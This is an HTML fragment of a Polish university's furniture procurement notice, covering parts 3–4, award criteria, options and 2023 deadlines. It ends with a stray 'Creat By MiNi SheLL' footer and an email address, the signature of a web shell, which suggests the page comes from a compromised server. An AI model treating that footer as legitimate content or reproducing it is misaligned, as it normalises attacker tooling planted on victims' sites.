oferta która uzyska najwięcej punktów obliczonych w oparciu o ustalone kryteria według wzoru C+T+K, i przyjętą metodę oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy od zamówienia złożonego przez Zamawiającego „T” (w cz. 1, 2, 3 - w zamówieniu podstawowym i w ramach prawa opcji)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w dostawie, od zamówienia złożonego przez Zamawiającego „K” (w cz. 1, 2, 3 - w zamówieniu podstawowym i w ramach prawa opcji)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa siedzisk, kanap, krzeseł biurowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39143110-0 - Łóżka i kanapy oraz specjalne meble tapicerowane</p> <p class="mb-0">39111100-4 - Siedziska obrotowe</p> <p class="mb-0">39113000-7 - Różne siedziska i krzesła</p> <p class="mb-0">39112000-0 - Krzesła</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający będzie uprawniony, lecz nie jest zobowiązany, do skorzystania z prawa opcji, w czasie obowiązywania umowy, zawartej w wyniku niniejszego postępowania.<br/>2.	Warunki skorzystania z prawa opcji: <br/>1)	prawem opcji objęta jest dostawa mebli, określonych w Formularzu cenowym i w liczbie określonej w Formularz cenowym; <br/>2)	Zamawiający zamówi podstawowy zakres zamówienia, określony w Formularzu cenowym;<br/>3)	przedmiot zamówienia objęty prawem opcji, określony w Formularzu cenowym, zostanie zakupiony w zależności od potrzeb Zamawiającego, zgodnie z następującymi zasadami:<br/>a)	warunkiem uruchomienia prawa opcji jest złożenie przez Zamawiającego oświadczenia woli o skorzystaniu z prawa opcji i jego zakresie. Zamawiający złoży Oświadczenie, w formie elektronicznej, na adres mailowy, wskazany przez Wykonawcę, w umowie, <br/>b)	Wykonawca będzie zobowiązany wykonać zamówienie, objęte prawem opcji, po uprzednim otrzymaniu oświadczenia woli od Zamawiającego, o skorzystaniu z prawa opcji i jego zakresie,<br/>c)	termin wykonania zamówienia, objętego prawem opcji, jest tożsamy z terminem wykonania zamówienia podstawowego, zadeklarowanego w kryterium oceny ofert, od dnia przesłania ww. Oświadczenia (zamówienia) do Wykonawcy,<br/>d)	prawo opcji realizowane będzie w terminie obowiązywania umowy, po wyczerpaniu przedmiotu zamówienia podstawowego, na takich samych warunkach jak zamówienie podstawowe, <br/>e)	ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym oraz niezmienne w całym okresie realizacji umowy, co Wykonawca akceptuje zawierając umowę, z zastrzeżeniem waloryzacji wynagrodzenia, opisanego w umowie,<br/>f)	wynagrodzenie za przedmiot umowy, w ramach prawa opcji, będzie stanowić iloczyn ceny jednostkowej brutto oraz liczby zamówionych mebli, wskazanych w treści oświadczenia woli, o którym mowa w lit. a),<br/>g)	Zamawiający może z prawa opcji korzystać wielokrotnie, do wyczerpania maksymalnej liczby mebli, określonej w Formularzu cenowym, w całym okresie, na który zawarta jest niniejsza umowa o zamówienie publiczne,<br/>h)	skorzystanie z prawa opcji nie wymaga aneksowania umowy,<br/>i)	w przypadku skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, poza zapłatą wynagrodzenia za prawidłowo wykonane dostawy wskazane w oświadczeniu Zamawiającego, <br/>j)	w przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystania z prawa opcji w niepełnym zakresie, Wykonawcy nie przysługuje względem zamawiającego żadne roszczenie z tego tytułu, <br/>k)	skorzystanie przez Zamawiającego z prawa opcji będzie uzależnione od aktualnego zapotrzebowania Zamawiającego oraz jego możliwości finansowych. <br/>4)	Skorzystanie z prawa opcji nie stanowi zmiany umowy, nie powoduje konieczności zawarcia dodatkowej umowy ani aneksu do umowy. <br/>5)	Zasady rozliczeń przedmiotu zamówienia objętego prawem opcji będą takie same jak zasady rozliczeń podstawowego przedmiotu zamówienia.<br/>6)	Z prawa opcji Zamawiający skorzysta na podstawie zapisów tej samej umowy zawartej w wyniku postępowania o udzielenie zamówienia, bez konieczności zawierania nowej umowy.<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia, w maksymalnym terminie:<br/>Część 3 - od 5 do 10 tygodni od daty złożenia zamówienia (od 35 do 70 dni kalendarzowych).<br/>Jednocześnie, w zakresie zamówienia z prawem opcji, okres obowiązywania umowy: Część 3 okres trwania umowy 12 miesięcy, od dnia zawarcia. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta która uzyska najwięcej punktów obliczonych w oparciu o ustalone kryteria według wzoru C+T+K, i przyjętą metodę oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy od zamówienia złożonego przez Zamawiającego „T” (w cz. 1, 2, 3 - w zamówieniu podstawowym i w ramach prawa opcji)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w dostawie, od zamówienia złożonego przez Zamawiającego „K” (w cz. 1, 2, 3 - w zamówieniu podstawowym i w ramach prawa opcji)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa wyposażenia meblowego, tapczanów do Ośrodka Wypoczynkowego <br/>w Dziwnowie i Domu studenckiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39130000-2 - Meble biurowe</p> <p class="mb-0">39141000-2 - Meble i wyposażenie kuchni</p> <p class="mb-0">39121100-7 - Biurka</p> <p class="mb-0">39143110-0 - Łóżka i kanapy oraz specjalne meble tapicerowane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta która uzyska najwięcej punktów obliczonych w oparciu o ustalone kryteria według wzoru C+T+K, i przyjętą metodę oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy od zamówienia złożonego przez Zamawiającego „T”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w dostawie, od zamówienia złożonego przez Zamawiającego „K”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> przedmiotowe środki dowodowe (jeżeli dotyczy), w postaci dokumentów potwierdzających równoważność norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych.<br/>Zamawiający przewiduje wezwanie do złożenia w wyznaczonym terminie przedmiotowych środków dowodowych, o których mowa w niniejszym punkcie, jeśli wykonawca ich nie złoży wraz z ofertą lub do ich uzupełnienia jeśli złożone przedmiotowe środki dowodowe będą niekompletne, poza przedmiotowymi środkami dowodowymi, które służą potwierdzeniu kryterium oceny ofert. <br/>Przedmiotowe środki dowodowe złożone w języku obcym, składa się wraz z tłumaczeniem na język polski. Tłumaczenie na język polski, musi obejmować elementy, które służą potwierdzeniu zgodności oferowanych dostaw z cechami wymaganymi w opisie przedmiotu zamówienia lub potwierdzeniu kryterium oceny ofert. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> przedmiotowe środki dowodowe (jeżeli dotyczy), w postaci dokumentów potwierdzających równoważność norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Dokumenty wymagane przez Zamawiającego, które należy złożyć składając ofertę: <br/>1)	formularz ofertowy, według wzoru udostępnionego przez Zamawiającego; <br/>2)	formularz cenowy, według wzoru udostępnionego przez Zamawiającego;<br/>3)	przedmiotowe środki dowodowe (jeżeli dotyczy), w postaci dokumentów potwierdzających równoważność norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych.<br/>Zamawiający przewiduje wezwanie do złożenia w wyznaczonym terminie przedmiotowych środków dowodowych, o których mowa w niniejszym punkcie, jeśli wykonawca ich nie złoży wraz z ofertą lub do ich uzupełnienia jeśli złożone przedmiotowe środki dowodowe będą niekompletne, poza przedmiotowymi środkami dowodowymi, które służą potwierdzeniu kryterium oceny ofert. <br/>Przedmiotowe środki dowodowe złożone w języku obcym, składa się wraz z tłumaczeniem na język polski. Tłumaczenie na język polski, musi obejmować elementy, które służą potwierdzeniu zgodności oferowanych dostaw z cechami wymaganymi w opisie przedmiotu zamówienia lub potwierdzeniu kryterium oceny ofert.<br/>4)	odpis lub Informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub Wykonawców jest umocowana do jego reprezentowania. <br/>Wykonawca nie jest zobowiązany do złożenia dokumentów rejestrowych, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów (NIP, Regon, <br/>nr KRS); <br/>5)	pełnomocnictwo lub inne dokumenty potwierdzające umocowanie do reprezentowania (odpowiednio: Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia), jeżeli w imieniu (odpowiednio: Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia) działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów rejestrowych (KRS, CEiIDG);<br/>6)	oświadczenia na podstawie art. 125 ust. 1 ustawy pzp, traktujące o braku podstaw do wykluczenia Wykonawcy z postępowania, wg. wzoru przekazanego przez Zamawiającego. <br/>Informacje zawarte w ww. oświadczeniu stanowią potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania<br/>	Uwaga! W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. dokument składa każdy z Wykonawców w zakresie braku podstaw do wykluczenia.<br/><br/>2.	Zamawiający nie będzie wzywał Wykonawcy, którego oferta zostanie najwyżej oceniona do złożenia oświadczeń i dokumentów potwierdzających brak podstaw do wykluczenia, w trybie art. 274 ust. 1 ustawy pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, np. łącząc się w konsorcja lub spółki cywilne lub inną formę prawną.<br/>2.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Wykonawcy składający ofertę wspólną wraz z ofertą składają stosowne pełnomocnictwo w oryginale, podpisane kwalifikowanymi podpisami elektronicznymi, podpisami zaufanymi lub przy użyciu dowodów osobistych z warstwą elektroniczną (tzw. podpisami osobistymi), przez osoby uprawnione do reprezentacji Wykonawców, wspólnie ubiegających się o zamówienie publiczne, uprawniające do wykonania określonych czynności w postępowaniu o udzielenie zamówienia publicznego. Pełnomocnictwo może także zostać złożone w elektronicznej kopii, potwierdzonej kwalifikowanym podpisem elektronicznym przez notariusza.<br/>4.	Zamawiający w toku prowadzonego postępowania będzie przesyłał wszelką korespondencję do pełnomocnika Wykonawców występujących wspólnie. <br/>5.	Przed zawarciem umowy (w przypadku wygrania postępowania) Wykonawcy składający wspólną ofertę będą mieli obowiązek przedstawić, na żądanie Zamawiającego, kopię umowy regulującej współpracę tych Wykonawców, zawierającą, co najmniej:<br/>a)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz solidarnej odpowiedzialności za realizację zamówienia,<br/>b)	określenie szczegółowego zakresu działania poszczególnych stron umowy, <br/>c)	określenie pełnomocnika uprawnionego do kontaktów z Zamawiającym oraz do wystawiania dokumentów związanych z płatnościami,<br/>d)	czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi. <br/>6.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia brak podstaw wykluczenia musi wykazać każdy z Wykonawców oddzielnie, wobec powyższego wszystkie oświadczenia i dokumenty w zakresie braku podstaw wykluczenia wymagane w postępowaniu składa odrębnie każdy z Wykonawców wspólnie występujących. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian postanowień przedmiotowej umowy w stosunku do treści złożonej oferty w następującym zakresie, okolicznościach i warunkach:<br/>1)	gdy podczas realizacji przedmiotu umowy ulegnie zmianie sposób lub zakres wykonania przedmiotu umowy przewidziany w ofercie, pod warunkiem, iż nie spowoduje to zwiększenia wynagrodzenia Wykonawcy.<br/>2)	w przypadku zmniejszenia liczby zamawianego przedmiotu umowy (w sytuacji wystąpienia okoliczności, których nie można było przewidzieć w chwili ogłoszenia postępowania i zawarcia umowy), wynagrodzenie ulegnie obniżeniu stosownie do takiego zmniejszenia;<br/>3)	gdy podczas realizacji umowy wystąpią nieprzewidywalne na etapie zawierania umowy okoliczności uniemożliwiające zrealizowanie przedmiotu zamówienia w sposób przewidziany w ofercie, a udzielenie w tym zakresie innego zamówienia publicznego w trybie ustawy – Prawo zamówień publicznych będzie niemożliwe lub niecelowe ze względu na interes publiczny,<br/>4)	zmiana spowodowana wpływem okoliczności związanych z wystąpieniem COVID-19 na należyte wykonanie umowy, dokonana zgodnie z art. 15r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. <br/>z 2021 r. poz. 2095 z późn. zm.)”.<br/>W trakcie trwania umowy Zamawiający dopuszcza zmianę wynagrodzenia, o której mowa w art. 439 ust. 1 pzp, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-09 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pum_edu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-09 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie w części 1, 2 i 3 objęte jest prawem opcji, o którym mowa w art. 441 ustawy pzp.<br/>2. Zamawiający unieważni postępowanie o udzielenie przedmiotowego zamówienia, po zmaterializowaniu się przesłanek, zawartych w art. 255 pkt 1-7 ustawy pzp, a także na podstawie art. 310 ustawy pzp, jeżeli środki publiczne, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostaną mu przyznane.<br/>3. Zamawiający żąda podania danych identyfikujących oferowany przedmiot zamówienia (zgodnie z wytycznymi Zamawiającego, w Formularzu cenowym, w każdej z części zamówienia), co stanowi o złożeniu oferty na opisany, przez Zamawiającego, przedmiot zamówienia. W ten sposób Wykonawca oświadcza co oferuje i potwierdza, że oferowany przedmiot zamówienia jest zgodny z parametrami określonymi przez Zamawiającego. Złożenie oferty bez podania nazwy lub/i typu lub/i modelu lub/i krótkiego opisu, oferowanego przedmiotu zamówienia, skutkuje odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Zamawiający może żądać wyjaśnień, w zakresie podanej przez Wykonawcę w Formularzu cenowym, nazwy lub/i typu lub/i modelu lub/i krótkiego opisu, w toku badania i oceny ofert.<br/>4. Przedmiot zamówienia, w części 4, z poz. 1 formularza, zostanie zamówiony na potrzeby Ośrodka Wypoczynkowego PUM w Dziwnowie więc wskazane jest, aby został dostarczony nie później niż do 01.07.2023r., ze względu na rozpoczęcie sezonu wczasowego. Przedmiot zamówienia, w części 4, z poz. 2-20 formularza, zostanie zamówiony na potrzeby Domu Studenckiego PUM w Szczecinie więc wskazane jest, aby został dostarczony nie później niż do 02.10.2023r., ze względu na planowane ukończenie remontu akademika do 30.09.2023r. i rozpoczęcie roku akademickiego. <br/>5. W zakresie zamówienia z prawem opcji, okres obowiązywania umowy:<br/>•	Część 1 okres trwania umowy 12 miesięcy, od dnia zawarcia.<br/>•	Część 2 okres trwania umowy 3 miesięcy, od dnia zawarcia.<br/>•	Część 3 okres trwania umowy 12 miesięcy, od dnia zawarcia.<br/>6. Wykonawca zrealizuje zamówienie:<br/>•	w części 1, 2 i 3, na podstawie zamówienia złożonego przez Zamawiającego i Oświadczenia woli Zamawiającego, o skorzystaniu z prawa opcji,<br/>•	w części 4, na podstawie zamówienia złożonego przez Zamawiającego.<br/>7. Zamawiający nie określa warunków udziału w postępowaniu.<br/>8. O udzielenie zamówienia może się ubiegać Wykonawca, który nie podlega wykluczeniu z postępowania na podstawie: 1)	art. 108 ust. 1 ustawy pzp,<br/>2)	art. 109 ust. 1 pkt 4) ustawy pzp, 3)	art. 7 ust. 1 ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>9. Zamawiający, w części 1, 2 i 3, przyzna punkty w kryterium „Cena”, biorąc pod uwagę „Łączną wartość brutto zamówienia w zł.” (zamówienie podstawowe + opcja).<br/>10. Podmioty zagraniczne: O udzielenie zamówienia mogą ubiegać się także Wykonawcy, mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej Polskiej. Wykonawcy ci zobowiązani są do złożenia dokumentów i oświadczeń, wymienionych w treści Rozdziału VII ust. 1 niniejszej SWZ. Zamawiający nie wymaga złożenia dokumentów, o<br/>których mowa w § 4 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od<br/>Wykonawcy. W przypadku wskazania przez Wykonawcę dokumentów - informacji lub odpisów z rejestrów, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów.<br/>11. Szczegółowe terminy realizacji zamówienia określone zostały w Rozdziale V. pkt. 1 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com